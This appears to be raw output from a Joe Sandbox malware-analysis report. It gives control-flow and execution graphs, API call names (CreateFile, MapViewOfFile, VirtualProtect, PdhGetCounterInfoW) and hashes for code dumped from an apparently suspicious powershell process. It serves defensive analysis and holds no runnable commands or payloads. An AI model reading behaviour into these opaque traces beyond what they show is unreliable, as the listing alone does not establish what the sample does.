                                                  control_flow_graph 1018 7ffd9b87df6a-7ffd9b87e963 1022 7ffd9b87e9ad 1018->1022 1023 7ffd9b87e965-7ffd9b87e967 1018->1023 1026 7ffd9b87e9ae-7ffd9b87e9b3 1022->1026 1027 7ffd9b87e9f7-7ffd9b87ea0d 1022->1027 1024 7ffd9b87e9c2-7ffd9b87e9f3 1023->1024 1025 7ffd9b87e969-7ffd9b87e978 1023->1025 1024->1027 1025->1024 1028 7ffd9b87e97a-7ffd9b87e97d 1025->1028 1029 7ffd9b87e9b7-7ffd9b87e9c1 1026->1029 1030 7ffd9b87ea0f-7ffd9b87ea5a CreateFileA 1027->1030 1028->1029 1033 7ffd9b87e97f-7ffd9b87e992 1028->1033 1029->1024 1029->1030 1031 7ffd9b87ea62-7ffd9b87ea9e call 7ffd9b87eaba 1030->1031 1032 7ffd9b87ea5c 1030->1032 1041 7ffd9b87eaa0 1031->1041 1042 7ffd9b87eaa5-7ffd9b87eab9 1031->1042 1032->1031 1035 7ffd9b87e994 1033->1035 1036 7ffd9b87e996-7ffd9b87e9a9 1033->1036 1035->1036 1036->1036 1038 7ffd9b87e9ab-7ffd9b87e9ac 1036->1038 1038->1022 1041->1042
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1786251212.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9b870000_powershell.jbxd
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: d1e4156c3068e8b233cbb9e9c845d41273646e83a33260ea85d7c7e5cc082e8a
                                                  • Instruction ID: ad9727d004abcbcdb416a54837cf60d726e0650ffebbb66b8c6f219fcb82e285
                                                  • Opcode Fuzzy Hash: d1e4156c3068e8b233cbb9e9c845d41273646e83a33260ea85d7c7e5cc082e8a
                                                  • Instruction Fuzzy Hash: 5961F770A1CA4C8FDB68EF18C8467F537E0FF59315F10422AE84EC32A2DA34A9418B91

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1043 7ffd9b87df82-7ffd9b87ebef 1047 7ffd9b87ebf1-7ffd9b87ec00 1043->1047 1048 7ffd9b87ec4a-7ffd9b87ecc7 CreateFileMappingW 1043->1048 1047->1048 1049 7ffd9b87ec02-7ffd9b87ec05 1047->1049 1055 7ffd9b87eccf-7ffd9b87ed0b call 7ffd9b87ed27 1048->1055 1056 7ffd9b87ecc9 1048->1056 1050 7ffd9b87ec3f-7ffd9b87ec47 1049->1050 1051 7ffd9b87ec07-7ffd9b87ec1a 1049->1051 1050->1048 1053 7ffd9b87ec1e-7ffd9b87ec31 1051->1053 1054 7ffd9b87ec1c 1051->1054 1053->1053 1057 7ffd9b87ec33-7ffd9b87ec3b 1053->1057 1054->1053 1061 7ffd9b87ed12-7ffd9b87ed26 1055->1061 1062 7ffd9b87ed0d 1055->1062 1056->1055 1057->1050 1062->1061
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1786251212.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9b870000_powershell.jbxd
                                                  Similarity
                                                  • API ID: CreateFileMapping
                                                  • String ID:
                                                  • API String ID: 524692379-0
                                                  • Opcode ID: 44746876aea5bd768ab87a43e3b508b2e8955f8d9712b98cb367a0a997a68346
                                                  • Instruction ID: 405b571321a0ca2f87503c8e12682c8a489e2f8c566e6730954218af5e24485b
                                                  • Opcode Fuzzy Hash: 44746876aea5bd768ab87a43e3b508b2e8955f8d9712b98cb367a0a997a68346
                                                  • Instruction Fuzzy Hash: E2510830A18A4C4FEB58EF28C84ABF53BD4FF59351F10026EE84EC3291DA35A8418B81

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1063 7ffd9b87ed76-7ffd9b87ed83 1064 7ffd9b87ed8e-7ffd9b87ed9f 1063->1064 1065 7ffd9b87ed85-7ffd9b87ed8d 1063->1065 1066 7ffd9b87eda1-7ffd9b87eda9 1064->1066 1067 7ffd9b87edaa-7ffd9b87ee61 MapViewOfFile 1064->1067 1065->1064 1066->1067 1071 7ffd9b87ee63 1067->1071 1072 7ffd9b87ee69-7ffd9b87ee86 1067->1072 1071->1072
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1786251212.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9b870000_powershell.jbxd
                                                  Similarity
                                                  • API ID: FileView
                                                  • String ID:
                                                  • API String ID: 3314676101-0
                                                  • Opcode ID: 323b4bcab713f7ce28404273278062f2db1b2c3e314e645bfbb852f6de0e10f9
                                                  • Instruction ID: 0dca50089fd6c5650fe005529947c2d18d516088b97cd3d402e17ee49d42be26
                                                  • Opcode Fuzzy Hash: 323b4bcab713f7ce28404273278062f2db1b2c3e314e645bfbb852f6de0e10f9
                                                  • Instruction Fuzzy Hash: B041283190CA889FDB19DB68D845AE87BF0FF5A321F14026ED089C31A2CB646846C791

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1073 7ffd9b87e7b8-7ffd9b87e7bf 1074 7ffd9b87e7c1-7ffd9b87e7c9 1073->1074 1075 7ffd9b87e7ca-7ffd9b87e880 K32GetModuleInformation 1073->1075 1074->1075 1079 7ffd9b87e882 1075->1079 1080 7ffd9b87e888-7ffd9b87e8b7 1075->1080 1079->1080
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1786251212.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9b870000_powershell.jbxd
                                                  Similarity
                                                  • API ID: InformationModule
                                                  • String ID:
                                                  • API String ID: 3425974696-0
                                                  • Opcode ID: e51673fef654a2faca5312225b0509c013348eaa07e236fa51378147070e87b6
                                                  • Instruction ID: e5e496dec7ee9af5e0b509ff0a9e79504ebc0ae2f81cb3f2d7a5b357df4d5172
                                                  • Opcode Fuzzy Hash: e51673fef654a2faca5312225b0509c013348eaa07e236fa51378147070e87b6
                                                  • Instruction Fuzzy Hash: B531F431A0CA4C8FDB1CDBA898456F97BE1EF59321F04427FD049D3692DB74A8468B81

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1108 7ffd9b87df62-7ffd9b87e834 1111 7ffd9b87e83c-7ffd9b87e880 K32GetModuleInformation 1108->1111 1112 7ffd9b87e882 1111->1112 1113 7ffd9b87e888-7ffd9b87e8b7 1111->1113 1112->1113
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1786251212.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9b870000_powershell.jbxd
                                                  Similarity
                                                  • API ID: InformationModule
                                                  • String ID:
                                                  • API String ID: 3425974696-0
                                                  • Opcode ID: 69063250619de12beadb253b965bf0f804b40f6ab328586121d34d247af3b51b
                                                  • Instruction ID: 7f706a23a968285ee0e11e3d17236338aad2ce785db4835ae5ef0191c1f7d181
                                                  • Opcode Fuzzy Hash: 69063250619de12beadb253b965bf0f804b40f6ab328586121d34d247af3b51b
                                                  • Instruction Fuzzy Hash: 2731C471A0CA1C8FDB1CDB9CD8496F97BE1FB69321F10426ED04AD3651DB74A8468B81
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1786251212.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9b870000_powershell.jbxd
                                                  Similarity
                                                  • API ID: FileView
                                                  • String ID:
                                                  • API String ID: 3314676101-0
                                                  • Opcode ID: 389ba69407a3a0a4640735691661be4cf12418318b10837ba099083e5249ae1b
                                                  • Instruction ID: 15b27436d8fc1ae65643a903c22706099dc5b3c0424e26ef76be0628f0acb557
                                                  • Opcode Fuzzy Hash: 389ba69407a3a0a4640735691661be4cf12418318b10837ba099083e5249ae1b
                                                  • Instruction Fuzzy Hash: 2521C33191CA0C9FDB1CEB5CD846AF977E0FB99325F10422ED04ED3651CB71A8428B85

                                                  Execution Graph

                                                  Execution Coverage:4.2%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:8.5%
                                                  Total number of Nodes:1645
                                                  Total number of Limit Nodes:30
                                                  execution_graph 9459 2d8b0a75f7f 9460 2d8b0a75f97 9459->9460 9466 2d8b0a76002 9459->9466 9461 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9460->9461 9460->9466 9462 2d8b0a75fe4 9461->9462 9463 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9462->9463 9464 2d8b0a75ff9 9463->9464 9465 2d8b0a6cff8 23 API calls 9464->9465 9465->9466 8331 2d8b0a65c7c 8332 2d8b0a65c83 8331->8332 8333 2d8b0a65cb0 VirtualProtect 8332->8333 8335 2d8b0a65bc0 8332->8335 8334 2d8b0a65cd9 GetLastError 8333->8334 8333->8335 8334->8335 9736 2d8b0a622fc GetProcessIdOfThread GetCurrentProcessId 9737 2d8b0a62327 CreateFileW 9736->9737 9738 2d8b0a623a2 9736->9738 9737->9738 9739 2d8b0a6235b WriteFile ReadFile CloseHandle 9737->9739 9739->9738 9740 2d8b0a73efb 9741 2d8b0a73f3b 9740->9741 9742 2d8b0a741a0 9740->9742 9741->9742 9744 2d8b0a74182 9741->9744 9745 2d8b0a73f6f 9741->9745 9743 2d8b0a74196 9742->9743 9747 2d8b0a74cb0 _log10_special 20 API calls 9742->9747 9748 2d8b0a74cb0 9744->9748 9747->9743 9751 2d8b0a74cd0 9748->9751 9752 2d8b0a74cea 9751->9752 9753 2d8b0a74ccb 9752->9753 9755 2d8b0a74b10 9752->9755 9753->9743 9756 2d8b0a74b50 _log10_special 9755->9756 9759 2d8b0a74bbc _log10_special 9756->9759 9766 2d8b0a74dd0 9756->9766 9758 2d8b0a74bf9 9773 2d8b0a75100 9758->9773 9759->9758 9760 2d8b0a74bc9 9759->9760 9769 2d8b0a749ec 9760->9769 9763 2d8b0a74bf7 _log10_special 9764 2d8b0a67d30 _log10_special 8 API calls 9763->9764 9765 2d8b0a74c21 9764->9765 9765->9753 9779 2d8b0a74df8 9766->9779 9770 2d8b0a74a30 _log10_special 9769->9770 9771 2d8b0a74a45 9770->9771 9772 2d8b0a75100 _log10_special 11 API calls 9770->9772 9771->9763 9772->9771 9774 2d8b0a75109 9773->9774 9775 2d8b0a75120 9773->9775 9777 2d8b0a6dffc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9774->9777 9778 2d8b0a75118 9774->9778 9776 2d8b0a6dffc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9775->9776 9776->9778 9777->9778 9778->9763 9780 2d8b0a74e37 _raise_exc _clrfp 9779->9780 9781 2d8b0a7504c RaiseException 9780->9781 9782 2d8b0a74df2 9781->9782 9782->9759 9467 2d8b0a76179 9468 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9467->9468 9469 2d8b0a76187 9468->9469 9470 2d8b0a76192 9469->9470 9471 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9469->9471 9471->9470 8336 2d8b0a6da78 8337 2d8b0a6da88 8336->8337 8338 2d8b0a6d8f0 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8337->8338 8339 2d8b0a6da93 __vcrt_uninitialize_ptd 8337->8339 8338->8339 9077 2d8b0a71df8 9078 2d8b0a71e00 9077->9078 9079 2d8b0a71e15 9078->9079 9080 2d8b0a71e2e 9078->9080 9081 2d8b0a6dffc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9079->9081 9084 2d8b0a6eb04 23 API calls 9080->9084 9085 2d8b0a71e25 9080->9085 9082 2d8b0a71e1a 9081->9082 9083 2d8b0a6dec0 _invalid_parameter_noinfo 49 API calls 9082->9083 9083->9085 9084->9085 9472 2d8b0a6bd78 9477 2d8b0a6bcab __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 9472->9477 9473 2d8b0a6bd9f 9474 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9473->9474 9475 2d8b0a6bda4 9474->9475 9476 2d8b0a6bdaf __FrameHandler3::GetHandlerSearchState 9475->9476 9478 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9475->9478 9477->9473 9477->9476 9479 2d8b0a6a448 9 API calls Is_bad_exception_allowed 9477->9479 9481 2d8b0a6a470 9477->9481 9478->9476 9479->9477 9482 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9481->9482 9483 2d8b0a6a47e 9482->9483 9483->9477 8340 2d8b0a6ce84 8343 2d8b0a6cc34 8340->8343 8350 2d8b0a6cbfc 8343->8350 8351 2d8b0a6cc0c 8350->8351 8352 2d8b0a6cc11 8350->8352 8353 2d8b0a6cbb8 11 API calls 8351->8353 8354 2d8b0a6cc18 8352->8354 8353->8352 8355 2d8b0a6cc2d 8354->8355 8356 2d8b0a6cc28 8354->8356 8358 2d8b0a6cbb8 8355->8358 8357 2d8b0a6cbb8 11 API calls 8356->8357 8357->8355 8359 2d8b0a6cbbd 8358->8359 8363 2d8b0a6cbee 8358->8363 8360 2d8b0a6cbe6 8359->8360 8362 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8359->8362 8361 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8360->8361 8361->8363 8362->8359 8364 2d8b0a67e80 8365 2d8b0a67e89 __scrt_release_startup_lock 8364->8365 8367 2d8b0a67e8d 8365->8367 8368 2d8b0a6c8ac 8365->8368 8369 2d8b0a6c8cc 8368->8369 8398 2d8b0a6c8e3 8368->8398 8370 2d8b0a6c8ea 8369->8370 8371 2d8b0a6c8d4 8369->8371 8402 2d8b0a6f5e0 8370->8402 8373 2d8b0a6dffc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8371->8373 8375 2d8b0a6c8d9 8373->8375 8399 2d8b0a6dec0 8375->8399 8383 2d8b0a6c979 8385 2d8b0a6c684 23 API calls 8383->8385 8384 2d8b0a6c961 8386 2d8b0a6dffc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8384->8386 8391 2d8b0a6c995 8385->8391 8387 2d8b0a6c966 8386->8387 8388 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8387->8388 8388->8398 8389 2d8b0a6c99b 8390 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8389->8390 8390->8398 8391->8389 8392 2d8b0a6c9c7 8391->8392 8393 2d8b0a6c9e0 8391->8393 8394 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8392->8394 8395 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8393->8395 8396 2d8b0a6c9d0 8394->8396 8395->8389 8397 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8396->8397 8397->8398 8398->8367 8432 2d8b0a6dd58 8399->8432 8403 2d8b0a6f5ed 8402->8403 8404 2d8b0a6c8ef 8402->8404 8569 2d8b0a6d84c 8403->8569 8408 2d8b0a6ecc4 GetModuleFileNameW 8404->8408 8406 2d8b0a6f61c 8586 2d8b0a6f2b8 8406->8586 8409 2d8b0a6ed1d 8408->8409 8410 2d8b0a6ed09 GetLastError 8408->8410 8411 2d8b0a6eb04 23 API calls 8409->8411 8765 2d8b0a6df70 8410->8765 8413 2d8b0a6ed4b 8411->8413 8419 2d8b0a6ed5c 8413->8419 8770 2d8b0a6fef8 8413->8770 8414 2d8b0a67d30 _log10_special 8 API calls 8416 2d8b0a6c906 8414->8416 8420 2d8b0a6c684 8416->8420 8418 2d8b0a6ed16 8418->8414 8773 2d8b0a6eba8 8419->8773 8421 2d8b0a6c6c2 8420->8421 8424 2d8b0a6c72e 8421->8424 8787 2d8b0a6f990 8421->8787 8423 2d8b0a6c81f 8426 2d8b0a6c84c 8423->8426 8424->8423 8425 2d8b0a6f990 23 API calls 8424->8425 8425->8424 8427 2d8b0a6c864 8426->8427 8428 2d8b0a6c89c 8426->8428 8427->8428 8429 2d8b0a6e01c _invalid_parameter_noinfo 11 API calls 8427->8429 8428->8383 8428->8384 8430 2d8b0a6c892 8429->8430 8431 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8430->8431 8431->8428 8433 2d8b0a6dd83 8432->8433 8440 2d8b0a6ddf4 8433->8440 8437 2d8b0a6ddcd 8438 2d8b0a6dde2 8437->8438 8439 2d8b0a6d0f0 _invalid_parameter_noinfo 28 API calls 8437->8439 8438->8398 8439->8438 8463 2d8b0a6db3c 8440->8463 8443 2d8b0a6ddaa 8443->8437 8450 2d8b0a6d0f0 8443->8450 8451 2d8b0a6d0ff GetLastError 8450->8451 8452 2d8b0a6d148 8450->8452 8453 2d8b0a6d114 8451->8453 8452->8437 8454 2d8b0a6d9b8 _invalid_parameter_noinfo 14 API calls 8453->8454 8455 2d8b0a6d12e SetLastError 8454->8455 8455->8452 8456 2d8b0a6d151 8455->8456 8457 2d8b0a6d0f0 _invalid_parameter_noinfo 26 API calls 8456->8457 8458 2d8b0a6d177 8457->8458 8512 2d8b0a70d80 8458->8512 8464 2d8b0a6db58 GetLastError 8463->8464 8465 2d8b0a6db93 8463->8465 8466 2d8b0a6db68 8464->8466 8465->8443 8469 2d8b0a6dba8 8465->8469 8476 2d8b0a6d9b8 8466->8476 8470 2d8b0a6dbdc 8469->8470 8471 2d8b0a6dbc4 GetLastError SetLastError 8469->8471 8470->8443 8472 2d8b0a6dee0 IsProcessorFeaturePresent 8470->8472 8471->8470 8473 2d8b0a6def3 8472->8473 8490 2d8b0a6dbf4 8473->8490 8477 2d8b0a6d9d7 FlsGetValue 8476->8477 8479 2d8b0a6d9ec 8476->8479 8478 2d8b0a6d9e4 SetLastError 8477->8478 8477->8479 8478->8465 8479->8478 8480 2d8b0a6e01c _invalid_parameter_noinfo 11 API calls 8479->8480 8481 2d8b0a6da0e 8480->8481 8482 2d8b0a6da2c FlsSetValue 8481->8482 8483 2d8b0a6da1c 8481->8483 8484 2d8b0a6da4a 8482->8484 8485 2d8b0a6da38 FlsSetValue 8482->8485 8488 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8483->8488 8486 2d8b0a6d4e4 _invalid_parameter_noinfo 11 API calls 8484->8486 8485->8483 8487 2d8b0a6da52 8486->8487 8489 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8487->8489 8488->8478 8489->8478 8491 2d8b0a6dc2e _invalid_parameter_noinfo 8490->8491 8492 2d8b0a6dc56 RtlCaptureContext RtlLookupFunctionEntry 8491->8492 8493 2d8b0a6dcc6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8492->8493 8494 2d8b0a6dc90 RtlVirtualUnwind 8492->8494 8495 2d8b0a6dd18 _invalid_parameter_noinfo 8493->8495 8494->8493 8498 2d8b0a67d30 8495->8498 8499 2d8b0a67d39 8498->8499 8500 2d8b0a67d44 GetCurrentProcess TerminateProcess 8499->8500 8501 2d8b0a68508 IsProcessorFeaturePresent 8499->8501 8502 2d8b0a68520 8501->8502 8507 2d8b0a686fc RtlCaptureContext 8502->8507 8508 2d8b0a68716 RtlLookupFunctionEntry 8507->8508 8509 2d8b0a6872c RtlVirtualUnwind 8508->8509 8510 2d8b0a68533 8508->8510 8509->8508 8509->8510 8511 2d8b0a684d4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8510->8511 8513 2d8b0a6d19f 8512->8513 8514 2d8b0a70d99 8512->8514 8516 2d8b0a70dec 8513->8516 8514->8513 8520 2d8b0a713ac 8514->8520 8517 2d8b0a70e05 8516->8517 8519 2d8b0a6d1af 8516->8519 8517->8519 8566 2d8b0a6f640 8517->8566 8519->8437 8529 2d8b0a6d778 GetLastError 8520->8529 8522 2d8b0a713bb 8528 2d8b0a71401 8522->8528 8565 2d8b0a6d2ec EnterCriticalSection 8522->8565 8528->8513 8530 2d8b0a6d79c FlsGetValue 8529->8530 8531 2d8b0a6d7b9 FlsSetValue 8529->8531 8533 2d8b0a6d7a9 8530->8533 8534 2d8b0a6d7b3 8530->8534 8532 2d8b0a6d7cb 8531->8532 8531->8533 8536 2d8b0a6e01c _invalid_parameter_noinfo 11 API calls 8532->8536 8535 2d8b0a6d825 SetLastError 8533->8535 8534->8531 8537 2d8b0a6d832 8535->8537 8544 2d8b0a6d845 8535->8544 8538 2d8b0a6d7da 8536->8538 8537->8522 8539 2d8b0a6d7f8 FlsSetValue 8538->8539 8540 2d8b0a6d7e8 FlsSetValue 8538->8540 8542 2d8b0a6d816 8539->8542 8543 2d8b0a6d804 FlsSetValue 8539->8543 8541 2d8b0a6d7f1 8540->8541 8545 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8541->8545 8546 2d8b0a6d4e4 _invalid_parameter_noinfo 11 API calls 8542->8546 8543->8541 8547 2d8b0a6d85d FlsGetValue 8544->8547 8548 2d8b0a6d878 FlsSetValue 8544->8548 8545->8533 8549 2d8b0a6d81e 8546->8549 8550 2d8b0a6d872 8547->8550 8553 2d8b0a6d86a 8547->8553 8551 2d8b0a6d885 8548->8551 8548->8553 8552 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8549->8552 8550->8548 8554 2d8b0a6e01c _invalid_parameter_noinfo 11 API calls 8551->8554 8552->8535 8553->8522 8555 2d8b0a6d894 8554->8555 8556 2d8b0a6d8b2 FlsSetValue 8555->8556 8557 2d8b0a6d8a2 FlsSetValue 8555->8557 8558 2d8b0a6d8be FlsSetValue 8556->8558 8559 2d8b0a6d8d0 8556->8559 8560 2d8b0a6d8ab 8557->8560 8558->8560 8561 2d8b0a6d4e4 _invalid_parameter_noinfo 11 API calls 8559->8561 8562 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8560->8562 8563 2d8b0a6d8d8 8561->8563 8562->8553 8563->8553 8564 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8563->8564 8564->8553 8567 2d8b0a6d778 _invalid_parameter_noinfo 23 API calls 8566->8567 8568 2d8b0a6f649 8567->8568 8570 2d8b0a6d85d FlsGetValue 8569->8570 8571 2d8b0a6d878 FlsSetValue 8569->8571 8572 2d8b0a6d872 8570->8572 8575 2d8b0a6d86a 8570->8575 8573 2d8b0a6d885 8571->8573 8571->8575 8572->8571 8574 2d8b0a6e01c _invalid_parameter_noinfo 11 API calls 8573->8574 8576 2d8b0a6d894 8574->8576 8575->8406 8577 2d8b0a6d8b2 FlsSetValue 8576->8577 8578 2d8b0a6d8a2 FlsSetValue 8576->8578 8579 2d8b0a6d8be FlsSetValue 8577->8579 8580 2d8b0a6d8d0 8577->8580 8581 2d8b0a6d8ab 8578->8581 8579->8581 8582 2d8b0a6d4e4 _invalid_parameter_noinfo 11 API calls 8580->8582 8583 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8581->8583 8584 2d8b0a6d8d8 8582->8584 8583->8575 8584->8575 8585 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8584->8585 8585->8575 8609 2d8b0a6f528 8586->8609 8591 2d8b0a6f30a 8591->8404 8594 2d8b0a6f323 8595 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8594->8595 8595->8591 8596 2d8b0a6f332 8596->8596 8635 2d8b0a6f65c 8596->8635 8599 2d8b0a6f42e 8600 2d8b0a6dffc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8599->8600 8602 2d8b0a6f433 8600->8602 8601 2d8b0a6f489 8604 2d8b0a6f4f0 8601->8604 8646 2d8b0a6ede8 8601->8646 8605 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8602->8605 8603 2d8b0a6f448 8603->8601 8606 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8603->8606 8608 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8604->8608 8605->8591 8606->8601 8608->8591 8610 2d8b0a6f54b 8609->8610 8615 2d8b0a6f555 8610->8615 8661 2d8b0a6d2ec EnterCriticalSection 8610->8661 8617 2d8b0a6f2ed 8615->8617 8618 2d8b0a6d84c 16 API calls 8615->8618 8621 2d8b0a6efb8 8617->8621 8619 2d8b0a6f61c 8618->8619 8620 2d8b0a6f2b8 69 API calls 8619->8620 8620->8617 8662 2d8b0a6eb04 8621->8662 8623 2d8b0a6efcc 8624 2d8b0a6efea 8623->8624 8625 2d8b0a6efd8 GetOEMCP 8623->8625 8626 2d8b0a6efff 8624->8626 8627 2d8b0a6efef GetACP 8624->8627 8625->8626 8626->8591 8628 2d8b0a6d35c 8626->8628 8627->8626 8629 2d8b0a6d3a7 8628->8629 8633 2d8b0a6d36b _invalid_parameter_noinfo 8628->8633 8630 2d8b0a6dffc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8629->8630 8632 2d8b0a6d3a5 8630->8632 8631 2d8b0a6d38e HeapAlloc 8631->8632 8631->8633 8632->8594 8632->8596 8633->8629 8633->8631 8634 2d8b0a6c1ac _invalid_parameter_noinfo 2 API calls 8633->8634 8634->8633 8636 2d8b0a6efb8 25 API calls 8635->8636 8637 2d8b0a6f689 8636->8637 8638 2d8b0a6f7df 8637->8638 8639 2d8b0a6f6c6 IsValidCodePage 8637->8639 8644 2d8b0a6f6e0 _invalid_parameter_noinfo 8637->8644 8640 2d8b0a67d30 _log10_special 8 API calls 8638->8640 8639->8638 8641 2d8b0a6f6d7 8639->8641 8642 2d8b0a6f425 8640->8642 8643 2d8b0a6f706 GetCPInfo 8641->8643 8641->8644 8642->8599 8642->8603 8643->8638 8643->8644 8678 2d8b0a6f0d0 8644->8678 8764 2d8b0a6d2ec EnterCriticalSection 8646->8764 8663 2d8b0a6eb28 8662->8663 8664 2d8b0a6eb23 8662->8664 8663->8664 8665 2d8b0a6d778 _invalid_parameter_noinfo 23 API calls 8663->8665 8664->8623 8666 2d8b0a6eb43 8665->8666 8670 2d8b0a70d4c 8666->8670 8671 2d8b0a6eb66 8670->8671 8672 2d8b0a70d61 8670->8672 8674 2d8b0a70db8 8671->8674 8672->8671 8673 2d8b0a713ac _invalid_parameter_noinfo 23 API calls 8672->8673 8673->8671 8675 2d8b0a70dcd 8674->8675 8676 2d8b0a70de0 8674->8676 8675->8676 8677 2d8b0a6f640 _invalid_parameter_noinfo 23 API calls 8675->8677 8676->8664 8677->8676 8679 2d8b0a6f10d GetCPInfo 8678->8679 8680 2d8b0a6f203 8678->8680 8679->8680 8686 2d8b0a6f120 8679->8686 8681 2d8b0a67d30 _log10_special 8 API calls 8680->8681 8682 2d8b0a6f2a2 8681->8682 8682->8638 8689 2d8b0a71e94 8686->8689 8690 2d8b0a6eb04 23 API calls 8689->8690 8691 2d8b0a71ed6 8690->8691 8709 2d8b0a6f9cc 8691->8709 8710 2d8b0a6f9d5 MultiByteToWideChar 8709->8710 8766 2d8b0a6d8f0 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8765->8766 8767 2d8b0a6df7d Concurrency::details::SchedulerProxy::DeleteThis 8766->8767 8768 2d8b0a6d8f0 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8767->8768 8769 2d8b0a6df9f 8768->8769 8769->8418 8771 2d8b0a6fce4 5 API calls 8770->8771 8772 2d8b0a6ff18 8771->8772 8772->8419 8774 2d8b0a6ebe7 8773->8774 8777 2d8b0a6ebcc 8773->8777 8775 2d8b0a6ebec 8774->8775 8776 2d8b0a6fa5c WideCharToMultiByte 8774->8776 8775->8777 8780 2d8b0a6dffc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8775->8780 8778 2d8b0a6ec43 8776->8778 8777->8418 8778->8775 8779 2d8b0a6ec4a GetLastError 8778->8779 8782 2d8b0a6ec75 8778->8782 8781 2d8b0a6df70 11 API calls 8779->8781 8780->8777 8783 2d8b0a6ec57 8781->8783 8784 2d8b0a6fa5c WideCharToMultiByte 8782->8784 8785 2d8b0a6dffc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8783->8785 8786 2d8b0a6ec9c 8784->8786 8785->8777 8786->8777 8786->8779 8788 2d8b0a6f91c 8787->8788 8789 2d8b0a6eb04 23 API calls 8788->8789 8790 2d8b0a6f940 8789->8790 8790->8421 9484 2d8b0a62f80 9485 2d8b0a62fa7 9484->9485 9486 2d8b0a63074 9485->9486 9487 2d8b0a62fc4 PdhGetCounterInfoW 9485->9487 9487->9486 9488 2d8b0a62fe6 GetProcessHeap HeapAlloc PdhGetCounterInfoW 9487->9488 9489 2d8b0a63018 StrCmpW 9488->9489 9490 2d8b0a63060 GetProcessHeap HeapFree 9488->9490 9489->9490 9492 2d8b0a6302d 9489->9492 9490->9486 9491 2d8b0a63520 12 API calls 9491->9492 9492->9490 9492->9491 9493 2d8b0a70180 GetProcessHeap 9783 2d8b0a67f0c 9784 2d8b0a67f30 __scrt_release_startup_lock 9783->9784 9785 